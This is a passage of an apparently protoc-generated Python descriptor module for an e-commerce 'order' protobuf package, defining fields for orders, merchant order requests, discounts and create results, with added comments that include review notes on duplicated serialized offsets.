      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=903,
  serialized_end=1000,
)
# Generated Descriptor for the order.OrderDiscountInfo message (amount,
# currency and value of one discount); protoc output -- do not edit by hand.
_ORDERDISCOUNTINFO = _descriptor.Descriptor(
  name='OrderDiscountInfo',
  full_name='order.OrderDiscountInfo',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # int64 amount = 1;
    _descriptor.FieldDescriptor(
      name='amount', full_name='order.OrderDiscountInfo.amount', index=0,
      number=1, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string currency = 2;
    _descriptor.FieldDescriptor(
      name='currency', full_name='order.OrderDiscountInfo.currency', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string value = 3;
    _descriptor.FieldDescriptor(
      name='value', full_name='order.OrderDiscountInfo.value', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=1002,
  serialized_end=1070,
)
# Generated Descriptor for the order.OrderListResult message (paged list of
# orders plus a result code/message); protoc output -- do not edit by hand.
_ORDERLISTRESULT = _descriptor.Descriptor(
  name='OrderListResult',
  full_name='order.OrderListResult',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # repeated message data = 1;
    _descriptor.FieldDescriptor(
      name='data', full_name='order.OrderListResult.data', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # int64 total = 2;
    _descriptor.FieldDescriptor(
      name='total', full_name='order.OrderListResult.total', index=1,
      number=2, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # enum code = 3 (enum_type resolved later from code.proto).
    _descriptor.FieldDescriptor(
      name='code', full_name='order.OrderListResult.code', index=2,
      number=3, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string msg = 4;
    _descriptor.FieldDescriptor(
      name='msg', full_name='order.OrderListResult.msg', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=1072,
  serialized_end=1171,
)
# Generated Descriptor for the order.OrderCreateResult message (created orders,
# per-order errors, and a result code/message); protoc output -- do not edit.
_ORDERCREATERESULT = _descriptor.Descriptor(
  name='OrderCreateResult',
  full_name='order.OrderCreateResult',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # repeated message orders = 1;
    _descriptor.FieldDescriptor(
      name='orders', full_name='order.OrderCreateResult.orders', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # repeated message errors = 2;
    _descriptor.FieldDescriptor(
      name='errors', full_name='order.OrderCreateResult.errors', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # enum code = 3 (enum_type resolved later from code.proto).
    _descriptor.FieldDescriptor(
      name='code', full_name='order.OrderCreateResult.code', index=2,
      number=3, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string msg = 4;
    _descriptor.FieldDescriptor(
      name='msg', full_name='order.OrderCreateResult.msg', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=1174,
  serialized_end=1303,
)
# Generated Descriptor for the order.CreateOrderError message (index of the
# failed order within the request plus a code/message); protoc output -- do not
# edit by hand.
_CREATEORDERERROR = _descriptor.Descriptor(
  name='CreateOrderError',
  full_name='order.CreateOrderError',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # int32 index = 1;
    _descriptor.FieldDescriptor(
      name='index', full_name='order.CreateOrderError.index', index=0,
      number=1, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # int32 code = 2;
    _descriptor.FieldDescriptor(
      name='code', full_name='order.CreateOrderError.code', index=1,
      number=2, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string msg = 3;
    _descriptor.FieldDescriptor(
      name='msg', full_name='order.CreateOrderError.msg', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=1305,
  serialized_end=1365,
)
# Generated Descriptor for the synthetic map-entry message backing
# MerchantOrderCreateReq.labels (map<string, string>); protoc output -- do not
# edit by hand.
_MERCHANTORDERCREATEREQ_LABELSENTRY = _descriptor.Descriptor(
  name='LabelsEntry',
  full_name='order.MerchantOrderCreateReq.LabelsEntry',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # string key = 1;
    _descriptor.FieldDescriptor(
      name='key', full_name='order.MerchantOrderCreateReq.LabelsEntry.key', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string value = 2;
    _descriptor.FieldDescriptor(
      name='value', full_name='order.MerchantOrderCreateReq.LabelsEntry.value', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  # b'8\001' encodes the map_entry=true message option.
  serialized_options=b'8\001',
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # NOTE(review): serialized_start/end here repeat the OrderCreateInfo
  # LabelsEntry offsets (535/580) as emitted by the generator -- confirm
  # against a fresh protoc run before relying on these offsets.
  serialized_start=535,
  serialized_end=580,
)
# Auto-generated descriptor for message order.MerchantOrderCreateReq:
# the request payload for creating a merchant order. Fields 1-6 and 8/11
# are strings (customer/merchant ids, business_code, store_id, country,
# order_type, remark, currency); field 7 `total_amount` is an int64;
# fields 9 `labels` and 10 `discounts` are repeated message fields
# (label=3), with `labels` backed by the LabelsEntry map-entry type
# nested below. Do not hand-edit generated descriptor data.
_MERCHANTORDERCREATEREQ = _descriptor.Descriptor(
name='MerchantOrderCreateReq',
full_name='order.MerchantOrderCreateReq',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='customer_user_id', full_name='order.MerchantOrderCreateReq.customer_user_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='merchant_user_id', full_name='order.MerchantOrderCreateReq.merchant_user_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_code', full_name='order.MerchantOrderCreateReq.business_code', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='store_id', full_name='order.MerchantOrderCreateReq.store_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='order.MerchantOrderCreateReq.country', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_type', full_name='order.MerchantOrderCreateReq.order_type', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount', full_name='order.MerchantOrderCreateReq.total_amount', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='remark', full_name='order.MerchantOrderCreateReq.remark', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='order.MerchantOrderCreateReq.labels', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='discounts', full_name='order.MerchantOrderCreateReq.discounts', index=9,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='order.MerchantOrderCreateReq.currency', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
# The LabelsEntry map-entry descriptor is nested inside this message.
nested_types=[_MERCHANTORDERCREATEREQ_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1368,
serialized_end=1735,
)
# Auto-generated descriptor for message order.MerchantOrderCreateResult:
# the response of a merchant-order create call. `code` (field 1) is an
# enum (type=14), `msg` (field 2) is a string, and `order` (field 3) is a
# singular message field (type=11) — presumably order.Order, resolved by
# the generated linking code elsewhere in this file.
_MERCHANTORDERCREATERESULT = _descriptor.Descriptor(
name='MerchantOrderCreateResult',
full_name='order.MerchantOrderCreateResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='order.MerchantOrderCreateResult.code', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='msg', full_name='order.MerchantOrderCreateResult.msg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order', full_name='order.MerchantOrderCreateResult.order', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1737,
serialized_end=1832,
)
# Auto-generated descriptor for the synthetic map-entry message
# order.Order.LabelsEntry, backing the `labels` map field of Order.
# Two string fields: `key` (field 1) and `value` (field 2).
_ORDER_LABELSENTRY = _descriptor.Descriptor(
name='LabelsEntry',
full_name='order.Order.LabelsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.Order.LabelsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.Order.LabelsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
# b'8\001': MessageOptions with map_entry=true.
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
# NOTE(review): the 535-580 span is identical to the one used by other
# LabelsEntry descriptors in this file — looks like generator output
# sharing one serialized definition; confirm against the .proto/protoc run.
serialized_start=535,
serialized_end=580,
)
# Auto-generated descriptor for message order.Order: the full order
# record. Mix of string fields (ids, type/status, remarks, currency,
# country, payment_type, ...), int64 amounts/timestamps (type=3), and
# message fields (type=11): review_info, address (singular), plus the
# repeated items, labels (map via LabelsEntry) and settlements.
# NOTE: field numbers 5 and 15 are absent from the sequence — presumably
# reserved/removed fields in the source .proto; confirm there.
_ORDER = _descriptor.Descriptor(
name='Order',
full_name='order.Order',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='order.Order.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_id', full_name='order.Order.user_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_type', full_name='order.Order.order_type', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='status', full_name='order.Order.status', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount', full_name='order.Order.total_amount', index=4,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items_amount', full_name='order.Order.items_amount', index=5,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='logistics_amount', full_name='order.Order.logistics_amount', index=6,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='discount_amount', full_name='order.Order.discount_amount', index=7,
number=9, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='order.Order.currency', index=8,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='order.Order.country', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fulfill_method', full_name='order.Order.fulfill_method', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='store_id', full_name='order.Order.store_id', index=11,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='review_info', full_name='order.Order.review_info', index=12,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cancel_reason', full_name='order.Order.cancel_reason', index=13,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='platform_remark', full_name='order.Order.platform_remark', index=14,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seller_remark', full_name='order.Order.seller_remark', index=15,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_remark', full_name='order.Order.user_remark', index=16,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='create_at', full_name='order.Order.create_at', index=17,
number=20, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='update_at', full_name='order.Order.update_at', index=18,
number=21, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='order.Order.items', index=19,
number=22, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='address', full_name='order.Order.address', index=20,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='payment_type', full_name='order.Order.payment_type', index=21,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cost_amount', full_name='order.Order.cost_amount', index=22,
number=25, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_code', full_name='order.Order.business_code', index=23,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_type', full_name='order.Order.business_type', index=24,
number=27, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='order.Order.labels', index=25,
number=28, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cancel_at', full_name='order.Order.cancel_at', index=26,
number=29, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='return_remark', full_name='order.Order.return_remark', index=27,
number=30, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='return_at', full_name='order.Order.return_at', index=28,
number=31, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='settlements', full_name='order.Order.settlements', index=29,
number=32, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='merchant_user_id', full_name='order.Order.merchant_user_id', index=30,
number=33, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
# The LabelsEntry map-entry descriptor is nested inside this message.
nested_types=[_ORDER_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1835,
serialized_end=2637,
)
# Auto-generated descriptor for the synthetic map-entry message
# order.OrderItem.SkuPropEntry, backing the `sku_prop` map field of
# OrderItem. Two string fields: `key` (field 1) and `value` (field 2).
_ORDERITEM_SKUPROPENTRY = _descriptor.Descriptor(
name='SkuPropEntry',
full_name='order.OrderItem.SkuPropEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.OrderItem.SkuPropEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.OrderItem.SkuPropEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
# b'8\001': MessageOptions with map_entry=true.
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3349,
serialized_end=3395,
)
# Auto-generated descriptor for the synthetic map-entry message
# order.OrderItem.LabelsEntry, backing the `labels` map field of
# OrderItem. Two string fields: `key` (field 1) and `value` (field 2).
_ORDERITEM_LABELSENTRY = _descriptor.Descriptor(
name='LabelsEntry',
full_name='order.OrderItem.LabelsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.OrderItem.LabelsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.OrderItem.LabelsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
